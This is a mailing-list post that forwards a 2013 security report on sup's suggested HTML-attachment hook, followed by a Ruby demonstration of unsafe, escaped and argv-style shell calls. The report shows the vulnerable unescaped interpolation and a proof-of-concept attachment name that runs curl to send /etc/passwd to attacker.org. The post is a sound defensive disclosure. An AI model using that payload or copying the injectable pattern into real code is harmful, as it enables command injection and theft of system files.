From: Gaute Hope <eg@gaute.vetsj.com>
To: sup-talk <sup-talk@rubyforge.org>, sup-devel <sup-devel@rubyforge.org>
Subject: Fwd: Security issue with suggested configuration of sup
Date: Sun, 18 Aug 2013 20:14:38 +0200
Message-ID: <1376849419-sup-8191@qwerzila>
Greetings suppers,
joernchen has pointed out to me that our suggested hook for viewing HTML
attachments has a serious security issue. The updated suggestion in [0] (wiki)
should be safer.
Please make sure that you update your mime-decode hook!
Best regards, Gaute
[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments
--- Begin forwarded message from joernchen ---
From: joernchen <...>
To: eg <eg@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup
[...]
At [0] the suggested configuration for viewing HTML attachments with
sup using the mime-decode hook is given as follows:
unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    # the attachment file name is interpolated, unescaped, into a string that /bin/sh parses
    `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
  end
end
This piece of code, however, is prone to command injection via the file
name of the attached file. The command injection triggers when sup
indexes the mail, so no user interaction is needed.
A better approach would be the following:
require 'shellwords'
unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
  end
end
[...]
A simple PoC would be sending an email with a file attachment named
like:
'$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html
to a sup user making use of the suggested decode hook.
[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments
[...]
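The three ways of shelling out discussed in this thread, side by side, as an added example that is not code from the sup wiki or from joernchen's mail. It replaces w3m with printf so it runs anywhere, and uses a constructed file name with a harmless marker in place of the exfiltration command above; `content_type` is safe to interpolate in the wiki hook only because the `when "text/html"` branch fixes its value.

```ruby
# Added example: why Shellwords.escape fixes the sup mime-decode hook, and the
# argv form that removes the shell from the picture entirely.
require 'shellwords'
require 'open3'

# Constructed attachment name in the shape of the report, with a harmless
# marker instead of a real command. The leading quote closes the hook's own
# single quote, and $(...) is then expanded by the shell.
EVIL_NAME = "'$(echo INJECTED)'.html".freeze

# Pattern from the original wiki hook: the name is interpolated straight into
# a string that /bin/sh parses. printf stands in for w3m; the shell runs the
# substitution before printf ever sees its argument, so the output is the
# marker, not the file name.
def render_unsafe(filename)
  `printf '%s\\n' '#{filename}'`.chomp
end

# Fix proposed in the mail: Shellwords.escape backslash-escapes every shell
# metacharacter, so sh hands the whole name to the command as one literal
# argument and no substitution takes place.
def render_escaped(filename)
  `printf '%s\\n' #{Shellwords.escape filename}`.chomp
end

# Stronger form: pass an argv array. Open3.capture2 with several arguments
# execs the program directly, so there is no shell to interpret the name.
def render_argv(filename)
  out, _status = Open3.capture2('printf', '%s\n', filename)
  out.chomp
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe:  #{render_unsafe(EVIL_NAME)}"
  puts "escaped: #{render_escaped(EVIL_NAME)}"
  puts "argv:    #{render_argv(EVIL_NAME)}"
end
```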